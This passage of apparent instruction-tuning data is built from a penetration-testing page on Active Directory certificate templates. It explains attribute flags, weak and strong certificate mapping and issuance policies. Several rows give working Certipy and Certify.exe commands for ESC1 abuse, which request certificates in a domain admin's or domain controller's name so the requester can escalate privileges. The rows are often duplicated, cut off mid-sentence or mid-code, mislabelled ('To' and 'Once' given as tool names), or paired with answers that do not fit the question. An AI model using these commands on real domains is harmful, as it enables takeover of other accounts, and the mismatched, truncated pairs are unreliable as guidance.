"docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Certificate templates - Certificate attributes?"}, {"role": "assistant", "content": "Before explaining weak and strong labels, it is important to talk about certificate attributs. The options in the \"Subject Name\" tab of the Windows Certificate Template Console correspond to the flags in the msPKI-Certificate-Name-Flag attribute of the certificate template. Flags whose names follow the pattern CT_FLAG_SUBJECT_REQUIRE_ relate to the information contained in the Subject field of the certificate, and CT_FLAG_SUBJECT_ALT_REQUIRE_ relates to the SAN extension.\n\nWhen a certificate template requires an attribute from the enrolled account, but the enrolled account does not have that attribute or it is not defined, the behaviour may differ. Most flags are strong requirements (i.e. enrolment fails if the attribute is not defined for the enrolled account), but there are exceptions, as shown in the table below: \n\n!CT_FLAG.webp\n\nSome flags prevent default users/computers from enrolling in a given certificate scheme, because the required attributes are not set by default:\n\n* mail: the mail attribute for users and computers is not set by default\n* dNSHostName: users do not have a dNSHostName attribute, so users cannot enroll in certificate templates requiring dNSHostName; computers will have their dNSHostName attribute set when the computer is attached to a domain, but the attribute will not be set automatically simply by creating a computer object in the AD\n* userPrincipalName: the UPN attribute is not set by default for computers, but it is for users\n* cn : all AD objects have a cn attribute set by default"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Certificate templates - Certificate attributes?", "response": "Before explaining weak and strong labels, it is important to talk about certificate attributs. The options in the \"Subject Name\" tab of the Windows Certificate Template Console correspond to the flags in the msPKI-Certificate-Name-Flag attribute of the certificate template. Flags whose names follow the pattern CT_FLAG_SUBJECT_REQUIRE_ relate to the information contained in the Subject field of the certificate, and CT_FLAG_SUBJECT_ALT_REQUIRE_ relates to the SAN extension.\n\nWhen a certificate template requires an attribute from the enrolled account, but the enrolled account does not have that attribute or it is not defined, the behaviour may differ. Most flags are strong requirements (i.e. enrolment fails if the attribute is not defined for the enrolled account), but there are exceptions, as shown in the table below: \n\n!CT_FLAG.webp\n\nSome flags prevent default users/computers from enrolling in a given certificate scheme, because the required attributes are not set by default:\n\n* mail: the mail attribute for users and computers is not set by default\n* dNSHostName: users do not have a dNSHostName attribute, so users cannot enroll in certificate templates requiring dNSHostName; computers will have their dNSHostName attribute set when the computer is attached to a domain, but the attribute will not be set automatically simply by creating a computer object in the AD\n* userPrincipalName: the UPN attribute is not set by default for computers, but it is for users\n* cn : all AD objects have a cn attribute set by default", "metadata": {"corpus_index": 56, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Certificate templates - Weak and strong mapping"}, {"role": "assistant", "content": "As explained before, _weak_ and _strong_ \"labels\" are applied to certificate mapping and will influence on the final behavior of explicit and implicit mappings during Kebreros and Schannel authentications.\n\nFollowing CVE-2022–26923 (certifried.md) discovered by Olivier Lyak, Microsoft has implemented a new security extension for the issued certificates, and two new registry keys to properly deal with certificate mapping.\n\n* The szOID_NTDS_CA_SECURITY_EXT extension contains the objectSid of the requester and is used during implicit strong mapping\n* The StrongCertificateBindingEnforcement registry key is used for Kerberos mapping\n* The CertificateMappingMethods registry key is used for Schannel implicit mapping\n\nKerberos authentication\n\nIn the case of Kerberos authentication, the introduction of _strong_ mapping for implicit matching means that the object's SID can be used (via the szOID_NTDS_CA_SECURITY_EXT certificate extension) rather than the UPN and DNS, which can be easily spoofed.\n\nIn the case of explicit mapping, the update has implemented _weak_ and _strong_ \"labels\" on the mapping types (see table in the Explicit certificate mapping section above). The use of strong mapping implies the use of the corresponding mapping types.\n\nDuring Kerberos authentication, the certificate mapping process will call the StrongCertificateBindingEnforcement registry key. This key can be equal to three values:\n\n* 0: no strong certificate mapping is realised. The new szOID_NTDS_CA_SECURITY_EXT extension is not check, all explicit mappings are allowed (see comments below) and the authentication behaviour is similar to what was done before the patch. This mode is no longer effective since 11/04/2023, and indicating the value 0 in the key is now equivalent to indicating 1\n* 1: default value after the patch. If explicit mapping is present, authentication is allowed. Otherwise, in the implicit case, weak mapping is authorised if the certificate does not contain an SID in the szOID_NTD"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Certificate templates - Weak and strong mapping", "response": "As explained before, _weak_ and _strong_ \"labels\" are applied to certificate mapping and will influence on the final behavior of explicit and implicit mappings during Kebreros and Schannel authentications.\n\nFollowing CVE-2022–26923 (certifried.md) discovered by Olivier Lyak, Microsoft has implemented a new security extension for the issued certificates, and two new registry keys to properly deal with certificate mapping.\n\n* The szOID_NTDS_CA_SECURITY_EXT extension contains the objectSid of the requester and is used during implicit strong mapping\n* The StrongCertificateBindingEnforcement registry key is used for Kerberos mapping\n* The CertificateMappingMethods registry key is used for Schannel implicit mapping\n\nKerberos authentication\n\nIn the case of Kerberos authentication, the introduction of _strong_ mapping for implicit matching means that the object's SID can be used (via the szOID_NTDS_CA_SECURITY_EXT certificate extension) rather than the UPN and DNS, which can be easily spoofed.\n\nIn the case of explicit mapping, the update has implemented _weak_ and _strong_ \"labels\" on the mapping types (see table in the Explicit certificate mapping section above). The use of strong mapping implies the use of the corresponding mapping types.\n\nDuring Kerberos authentication, the certificate mapping process will call the StrongCertificateBindingEnforcement registry key. This key can be equal to three values:\n\n* 0: no strong certificate mapping is realised. The new szOID_NTDS_CA_SECURITY_EXT extension is not check, all explicit mappings are allowed (see comments below) and the authentication behaviour is similar to what was done before the patch. This mode is no longer effective since 11/04/2023, and indicating the value 0 in the key is now equivalent to indicating 1\n* 1: default value after the patch. If explicit mapping is present, authentication is allowed. Otherwise, in the implicit case, weak mapping is authorised if the certificate does not contain an SID in the szOID_NTD", "metadata": {"corpus_index": 57, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Certificate templates - Weak and strong mapping during a pentest?"}, {"role": "assistant", "content": "As explained before, _weak_ and _strong_ \"labels\" are applied to certificate mapping and will influence on the final behavior of explicit and implicit mappings during Kebreros and Schannel authentications.\n\nFollowing CVE-2022–26923 (certifried.md) discovered by Olivier Lyak, Microsoft has implemented a new security extension for the issued certificates, and two new registry keys to properly deal with certificate mapping.\n\n* The szOID_NTDS_CA_SECURITY_EXT extension contains the objectSid of the requester and is used during implicit strong mapping\n* The StrongCertificateBindingEnforcement registry key is used for Kerberos mapping\n* The CertificateMappingMethods registry key is used for Schannel implicit mapping\n\nKerberos authentication\n\nIn the case of Kerberos authentication, the introduction of _strong_ mapping for implicit matching means that the object's SID can be used (via the szOID_NTDS_CA_SECURITY_EXT certificate extension) rather than the UPN and DNS, which can be easily spoofed.\n\nIn the case of explicit mapping, the update has implemented _weak_ and _strong_ \"labels\" on the mapping types (see table in the Explicit certificate mapping section above). The use of strong mapping implies the use of the corresponding mapping types.\n\nDuring Kerberos authentication, the certificate mapping process will call the StrongCertificateBindingEnforcement registry key. This key can be equal to three values:\n\n* 0: no strong certificate mapping is realised. The new szOID_NTDS_CA_SECURITY_EXT extension is not check, all explicit mappings are allowed (see comments below) and the authentication behaviour is similar to what was done before the patch. This mode is no longer effective since 11/04/2023, and indicating the value 0 in the key is now equivalent to indicating 1\n* 1: default value after the patch. If explicit mapping is present, authentication is allowed. Otherwise, in the implicit case, weak mapping is authorised if the certificate does not contain an SID in the szOID_NTD"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Certificate templates - Weak and strong mapping during a pentest?", "response": "As explained before, _weak_ and _strong_ \"labels\" are applied to certificate mapping and will influence on the final behavior of explicit and implicit mappings during Kebreros and Schannel authentications.\n\nFollowing CVE-2022–26923 (certifried.md) discovered by Olivier Lyak, Microsoft has implemented a new security extension for the issued certificates, and two new registry keys to properly deal with certificate mapping.\n\n* The szOID_NTDS_CA_SECURITY_EXT extension contains the objectSid of the requester and is used during implicit strong mapping\n* The StrongCertificateBindingEnforcement registry key is used for Kerberos mapping\n* The CertificateMappingMethods registry key is used for Schannel implicit mapping\n\nKerberos authentication\n\nIn the case of Kerberos authentication, the introduction of _strong_ mapping for implicit matching means that the object's SID can be used (via the szOID_NTDS_CA_SECURITY_EXT certificate extension) rather than the UPN and DNS, which can be easily spoofed.\n\nIn the case of explicit mapping, the update has implemented _weak_ and _strong_ \"labels\" on the mapping types (see table in the Explicit certificate mapping section above). The use of strong mapping implies the use of the corresponding mapping types.\n\nDuring Kerberos authentication, the certificate mapping process will call the StrongCertificateBindingEnforcement registry key. This key can be equal to three values:\n\n* 0: no strong certificate mapping is realised. The new szOID_NTDS_CA_SECURITY_EXT extension is not check, all explicit mappings are allowed (see comments below) and the authentication behaviour is similar to what was done before the patch. This mode is no longer effective since 11/04/2023, and indicating the value 0 in the key is now equivalent to indicating 1\n* 1: default value after the patch. If explicit mapping is present, authentication is allowed. Otherwise, in the implicit case, weak mapping is authorised if the certificate does not contain an SID in the szOID_NTD", "metadata": {"corpus_index": 57, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Certificate templates - Issuance policies?"}, {"role": "assistant", "content": "It is possible to apply issuance policies to certificate templates. This takes the form of a certificate extension, and is stored as an OID (object identifier) in the msPKI-Certificate-Policy attribute of the template. When the CA issues the certificate, the policy is added to the \"Certificate Policies\" attribute of the certificate. A template stores required policies in the msPKI-RA-Policies attribute.\n\nAn issuance policy can be set up by a company, for example, for access control: a system can require a user to present a certificate with a given policy in order to guarantee that the system only grants access to authorised users. Issuing policies are msPKI-Enterprise-Oid objects found in the PKI OID container (CN=OID,CN=Public Key Services,CN=Services, in the Configuration Naming Context).\n\nThis object has an msDS-OIDToGroupLink attribute which allows a policy to be linked to an AD group so that a system can authorise a user presenting the certificate as if he were a member of this group. As explained by Jonas Bülow Knudsen in his ADCS ESC13 article.\n\n> If you perform client authentication with the certificate, then you will receive an access token specifying the membership of this group.\n> \n> (specterops.io)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Certificate templates - Issuance policies?", "response": "It is possible to apply issuance policies to certificate templates. This takes the form of a certificate extension, and is stored as an OID (object identifier) in the msPKI-Certificate-Policy attribute of the template. When the CA issues the certificate, the policy is added to the \"Certificate Policies\" attribute of the certificate. A template stores required policies in the msPKI-RA-Policies attribute.\n\nAn issuance policy can be set up by a company, for example, for access control: a system can require a user to present a certificate with a given policy in order to guarantee that the system only grants access to authorised users. Issuing policies are msPKI-Enterprise-Oid objects found in the PKI OID container (CN=OID,CN=Public Key Services,CN=Services, in the Configuration Naming Context).\n\nThis object has an msDS-OIDToGroupLink attribute which allows a policy to be linked to an AD group so that a system can authorise a user presenting the certificate as if he were a member of this group. As explained by Jonas Bülow Knudsen in his ADCS ESC13 article.\n\n> If you perform client authentication with the certificate, then you will receive an access token specifying the membership of this group.\n> \n> (specterops.io)", "metadata": {"corpus_index": 58, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Certificate templates - Issuance policies?"}, {"role": "assistant", "content": "It is possible to apply issuance policies to certificate templates. This takes the form of a certificate extension, and is stored as an OID (object identifier) in the msPKI-Certificate-Policy attribute of the template. When the CA issues the certificate, the policy is added to the \"Certificate Policies\" attribute of the certificate. A template stores required policies in the msPKI-RA-Policies attribute.\n\nAn issuance policy can be set up by a company, for example, for access control: a system can require a user to present a certificate with a given policy in order to guarantee that the system only grants access to authorised users. Issuing policies are msPKI-Enterprise-Oid objects found in the PKI OID container (CN=OID,CN=Public Key Services,CN=Services, in the Configuration Naming Context).\n\nThis object has an msDS-OIDToGroupLink attribute which allows a policy to be linked to an AD group so that a system can authorise a user presenting the certificate as if he were a member of this group. As explained by Jonas Bülow Knudsen in his ADCS ESC13 article.\n\n> If you perform client authentication with the certificate, then you will receive an access token specifying the membership of this group.\n> \n> (specterops.io)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Certificate templates - Issuance policies?", "response": "It is possible to apply issuance policies to certificate templates. This takes the form of a certificate extension, and is stored as an OID (object identifier) in the msPKI-Certificate-Policy attribute of the template. When the CA issues the certificate, the policy is added to the \"Certificate Policies\" attribute of the certificate. A template stores required policies in the msPKI-RA-Policies attribute.\n\nAn issuance policy can be set up by a company, for example, for access control: a system can require a user to present a certificate with a given policy in order to guarantee that the system only grants access to authorised users. Issuing policies are msPKI-Enterprise-Oid objects found in the PKI OID container (CN=OID,CN=Public Key Services,CN=Services, in the Configuration Naming Context).\n\nThis object has an msDS-OIDToGroupLink attribute which allows a policy to be linked to an AD group so that a system can authorise a user presenting the certificate as if he were a member of this group. As explained by Jonas Bülow Knudsen in his ADCS ESC13 article.\n\n> If you perform client authentication with the certificate, then you will receive an access token specifying the membership of this group.\n> \n> (specterops.io)", "metadata": {"corpus_index": 58, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Certificate templates - (ESC1) Template allows SAN"}, {"role": "assistant", "content": "When a certificate template allows to specify a subjectAltName, it is possible to request a certificate for another user. It can be used for privileges escalation if the EKU specifies Client Authentication or ANY.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC1 and ESC2 scenarios. \n\nOnce a vulnerable template is found (how to enumerate), a request shall be made to obtain a certificate.\n\n``bash\n#To specify a user account in the SAN\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin'\n\n#To specify a computer account in the SAN\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'\n`\n\n> [!WARNING]\n> The $ADCS_HOST target must be a FQDN (not an IP).\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n> [!NOTE]\n> If you get an \"Object SID mismatch\" error during the authentication, this could mean that Kerberos is enforcing strong certificate mapping. This is the default behavior since february 2025 (more information). It is then possible to specify the security identifier (using the certipy's flag -sid) corresponding at the specified subjectAltName.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used.\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Certificate templates - (ESC1) Template allows SAN", "response": "When a certificate template allows to specify a subjectAltName, it is possible to request a certificate for another user. It can be used for privileges escalation if the EKU specifies Client Authentication or ANY.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC1 and ESC2 scenarios. \n\nOnce a vulnerable template is found (how to enumerate), a request shall be made to obtain a certificate.\n\n``bash\n#To specify a user account in the SAN\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin'\n\n#To specify a computer account in the SAN\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'\n`\n\n> [!WARNING]\n> The $ADCS_HOST target must be a FQDN (not an IP).\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n> [!NOTE]\n> If you get an \"Object SID mismatch\" error during the authentication, this could mean that Kerberos is enforcing strong certificate mapping. This is the default behavior since february 2025 (more information). It is then possible to specify the security identifier (using the certipy's flag -sid) corresponding at the specified subjectAltName.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used.\n\n``powershell", "metadata": {"corpus_index": 59, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certificate templates - (ESC1) Template allows SAN"}, {"role": "assistant", "content": "When a certificate template allows to specify a subjectAltName, it is possible to request a certificate for another user. It can be used for privileges escalation if the EKU specifies Client Authentication or ANY.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC1 and ESC2 scenarios. \n\nOnce a vulnerable template is found (how to enumerate), a request shall be made to obtain a certificate.\n\n``bash\n#To specify a user account in the SAN\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin'\n\n#To specify a computer account in the SAN\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'\n`\n\n> [!WARNING]\n> The $ADCS_HOST target must be a FQDN (not an IP).\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n> [!NOTE]\n> If you get an \"Object SID mismatch\" error during the authentication, this could mean that Kerberos is enforcing strong certificate mapping. This is the default behavior since february 2025 (more information). It is then possible to specify the security identifier (using the certipy's flag -sid) corresponding at the specified subjectAltName.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used.\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certificate templates - (ESC1) Template allows SAN", "response": "When a certificate template allows to specify a subjectAltName, it is possible to request a certificate for another user. It can be used for privileges escalation if the EKU specifies Client Authentication or ANY.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC1 and ESC2 scenarios. \n\nOnce a vulnerable template is found (how to enumerate), a request shall be made to obtain a certificate.\n\n``bash\n#To specify a user account in the SAN\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin'\n\n#To specify a computer account in the SAN\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'\n`\n\n> [!WARNING]\n> The $ADCS_HOST target must be a FQDN (not an IP).\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n> [!TIP]\n> By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.\n\n> [!NOTE]\n> If you get an \"Object SID mismatch\" error during the authentication, this could mean that Kerberos is enforcing strong certificate mapping. This is the default behavior since february 2025 (more information). It is then possible to specify the security identifier (using the certipy's flag -sid) corresponding at the specified subjectAltName.\n\n=== Windows\n\nFrom Windows systems, the Certify (C#) tool can be used.\n\n``powershell", "metadata": {"corpus_index": 59, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the To command for certificate templates - (esc1) template allows san"}, {"role": "assistant", "content": "#To specify a user account in the SAN\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin'\n\n#To specify a computer account in the SAN\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the To command for certificate templates - (esc1) template allows san", "response": "#To specify a user account in the SAN\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin'\n\n#To specify a computer account in the SAN\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'", "metadata": {"corpus_index": 60, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "To"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Certificate templates - (ESC1) Template allows SAN?"}, {"role": "assistant", "content": "#To specify a user account in the SAN\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin'\n\n#To specify a computer account in the SAN\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Certificate templates - (ESC1) Template allows SAN?", "response": "#To specify a user account in the SAN\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template' -upn 'domain admin'\n\n#To specify a computer account in the SAN\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'vulnerable template' -dns 'dc.domain.local'", "metadata": {"corpus_index": 60, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}, {"role": "assistant", "content": "Certify.exe find /vulnerable /currentuser\n``\n\nOnce a vulnerable template is found, a request shall be made to obtain a certificate, with another high-priv user set as SAN (subjectAltName).\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\" /altname:\"admin\"\n``\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "response": "Certify.exe find /vulnerable /currentuser\n``\n\nOnce a vulnerable template is found, a request shall be made to obtain a certificate, with another high-priv user set as SAN (subjectAltName).\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\" /altname:\"admin\"\n``\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n:::", "metadata": {"corpus_index": 61, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}, {"role": "assistant", "content": "Certify.exe find /vulnerable /currentuser\n``\n\nOnce a vulnerable template is found, a request shall be made to obtain a certificate, with another high-priv user set as SAN (subjectAltName).\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\" /altname:\"admin\"\n``\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "response": "Certify.exe find /vulnerable /currentuser\n``\n\nOnce a vulnerable template is found, a request shall be made to obtain a certificate, with another high-priv user set as SAN (subjectAltName).\n\n`powershell\nCertify.exe request /ca:'domain\\ca' /template:\"Vulnerable template\" /altname:\"admin\"\n``\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.\n\n:::", "metadata": {"corpus_index": 61, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Once for find vulnerable/abusable certificate templates using all groups the current user context is a part of:?"}, {"role": "assistant", "content": "Once a vulnerable template is found, a request shall be made to obtain a certificate, with another high-priv user set as SAN (`subjectAltName`)."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Once for find vulnerable/abusable certificate templates using all groups the current user context is a part of:?", "response": "Once a vulnerable template is found, a request shall be made to obtain a certificate, with another high-priv user set as SAN (`subjectAltName`).", "metadata": {"corpus_index": 62, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Once"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Find vulnerable/abusable certificate templates using all groups the current user context is a part of:"}, {"role": "assistant", "content": "Once a vulnerable template is found, a request shall be made to obtain a certificate, with another high-priv user set as SAN (`subjectAltName`)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Find vulnerable/abusable certificate templates using all groups the current user context is a part of:", "response": "Once a vulnerable template is found, a request shall be made to obtain a certificate, with another high-priv user set as SAN (`subjectAltName`).", "metadata": {"corpus_index": 62, "category": 